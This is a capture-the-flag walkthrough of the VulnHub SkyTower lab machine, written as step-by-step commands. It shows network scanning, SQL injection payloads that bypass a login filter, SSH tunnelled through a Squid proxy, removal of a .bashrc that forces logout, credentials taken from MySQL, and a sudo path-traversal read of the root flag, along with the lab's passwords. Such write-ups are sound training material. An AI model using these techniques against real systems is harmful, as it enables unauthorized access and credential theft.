VulnHub: SkyTower: 1

SkyTower: 1

Initial foothold

1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.40.

2.Port scan

nmap -Pn 10.0.2.40
nmap -Pn -p1000- 10.0.2.40

There’s 1 filtered port (22) and 2 open ports (80 and 3128).

3. OS and service scan

nmap -A -p22,80,3128 10.0.2.40

4. Vuln scan

nmap --script vuln -p22,80,3128 10.0.2.40

There’s ‘login.php’ on the HTTP service.

Service Enumeration

There’re 3 services

• 22/tcp filtered ssh

1. Connect

ssh 10.0.2.40

When I tried to connect, it froze.

• 80/tcp open http Apache httpd 2.2.22 ((Debian))

1. Nikto scan

2. Directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.40/ -x php,txt,html,sh,cgi,bak -q

3. Access HTTP site

View page source

4. SQL injection

Since It’s a login form. I will try SQL injection.

test@test.com
test

Intercept w/ Burp Suite

Send to the Repeater.

Starting w/ this input:

1' or 1=1--

Use decoder to encode for URL

Copy to both email and password parameters. There’s am error mesasge

Take a closer look

There’re 2 problems that I’m facing:

1. Filter

In my experience, error-based SQLi will show a message like this:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 

In this case, it’s a weird error message, ‘11’.
Because of this, I suspect that there’s a filter in the code.

2. comment

I supplied ’--’ as acomment to suppress the password field, but the error message still shows that there’s some handling w/ the password field. I need to change it.

To bypass the filter problem, I changed ‘or’ to ‘||’

1' || 1=1--

Take a closer look at the error message, the filter problem should be gone for now.

1' || 1=1-- - -> failed
1' || 1=1--+ -> failed
1' || 1=1# -> succeeded

I got a credential, john : hereisjohn.

• 3128/tcp open http-proxy Squid http proxy 3.1.20

Access w/ browser. It’s a proxy service.

Exploitation

There’s only SSH service left and proxy service. I will try to use a proxy tunnel and access SSH via the created tunnel

1. To create proxy tunnel, use this command:

proxytunnel -p <target ip>:<proxy port> -d 127.0.0.1:<target port> -a <our port>
proxytunnel -p 10.0.2.40:3128 -d 127.0.0.1:22 -a 1234

2. Connect to SSH

ssh john@127.0.0.1 -p 1234

I could connect, but the connection was cut immediately.

3. Working around SSH to get the shell

• SSH shellshock

ssh john@127.0.0.1 -p 1234 '() { :;}; /bin/bash'

• Just call /bin/bash

ssh john@127.0.0.1 -p 1234 /bin/bash
id

4. TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

This machine doesn't have python.

Try for another one, echo.

which echo
echo os.system('/bin/bash')

My connection was cut again. I’m tired of this, so I have to work around.

My first suspicion is ‘.bashrc’.

ls -la

There’s the ‘.bashrc’ file.

Edit it

nano .bashrc

I cannot edit it.

Read it

cat .bashrc

There’s an ‘exit’ command in the file.

Just remove it

rm .bashrc

Login again. This time, I don't have to call /bin/bash.

ssh john@127.0.0.1 -p 1234

I’m good to go.

Privilege Escalation

1. Verify users

cat /etc/passwd

There’re 3 users on this machine: john, sara, and william.

2. Explore directories

I explored as listed

/opt
/tmp
/var
/var/backups
/var/log
/var/mail
/var/www/html

Finally, I found the ‘login.php’ in /var/www/html. Here are the commands

cd /var/www/html
ls -la
cat login.php

I got MySQL credential

3. Verify sudo

sudo -l

John cannot run sudo command.

4. Access mysql

Verify version

mysql -V

Login to mysql

mysql -uroot -proot

List database

use mysql;
show databases;

There’s SkyTech.

Show tables in SkyTech

use SkyTech;
show tables;

There’s login table.

Retrieve data

select * from login

I got the other 2 users’ credentials, sara and william.

5. Login as sara

su sara

The connection was cut immediately like john’s shell.

Remove .bashrc

ssh sara@127.0.0.1 -p 1234 /bin/bash
rm .bashrc

Login again

ssh sara@127.0.0.1 -p 1234

6. sara’s sudo

Verify sudo

sudo -l

This user can use /bin/cat /account/*/

Verify path

ls -la /

There’s /accounts directory.

Use wildcard to access /root

sudo /bin/cat /accounts/../root/flag.txt

Now I got root password

Login as root

su -
password: theskytower